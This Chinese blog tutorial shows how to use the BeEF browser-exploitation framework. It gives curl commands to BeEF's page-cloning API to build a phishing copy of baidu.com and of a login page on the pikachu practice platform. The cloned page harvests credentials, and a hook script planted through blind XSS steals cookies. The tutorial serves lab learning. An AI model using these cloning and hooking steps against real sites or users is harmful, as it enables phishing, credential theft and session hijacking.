BeEF-XSS在本机制作简易钓鱼网站

BeEF(Browser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit(MSF)进行渗透。基于Ruby语言编写,并且支持图形化界面,操作简单。

一、配置BeEF

# 安装beef
sudo apt install beef-xss
# 配置文件
/usr/share/beef-xss/config.yaml

将本地IP地址设置为监听地址
ifconfig查看本机地址
在这里插入图片描述
修改配置文件
在这里插入图片描述

# 启动beef 账号beef密码beef
cd /usr/share/beef-xss
./beef

启动成功!
在这里插入图片描述
Hook URL:控制用户请求js文件
UI URL:beef控制台
RESTful API key:beef启动需要的字符串
在这里插入图片描述

二、使用beef克隆其他网站

(1)使用 beef 克隆其他网站

curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"<URL of site to clone>", "mount":"<where to mount>"}' -X POST http://<BeEFURL>/api/seng/clone_page?token=<token>
// <URL of site to clone> 需要克隆的网址
// <where to mount> 克隆的页面在服务器的哪个路径访问
// <token> 服务启动时的 beef API key
# 克隆
curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https://www.baidu.com", "mount":"/clone_site_baidu"}' -X POST http://192.168.0.186:3000/api/seng/clone_page?token=acb2099fa6d344c003668100735dd88e76a507f2

如图所示,克隆成功!
在这里插入图片描述
不知道为啥图片没加载成功
在这里插入图片描述

(2)使用 beef 克隆 pikachu 平台的”反射型XSS(post)“的登录页面获取账号密码

访问 http://kali_ip:3000/pikachu_magedu ,可以看到beef中有机器上线,在页面中进行登录

curl -H "Content-Type: application/json; charset=UTF-8" -d
'{"url":"http://pikachu_ip/vul/xss/xsspost/post_login.php","mount":"/pikachu_mag
edu"}' -X POST http://kali_ip:3000/api/seng/clone_page?token=XX

在这里插入图片描述
可以在beef的 logs 模块中查看到提交的 form 表单信息
在这里插入图片描述

(3)使用 beef 攻击 pikachu 平台的”XSS之盲打“页面获取cookie

在”XSS之盲打“中上传hook脚本,让用户触发XSS
在这里插入图片描述

选择 Current Browser -> Commands -> Get Cookie 并点击 Execute 获取 cookie
在这里插入图片描述
验证cookie值是否正确
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值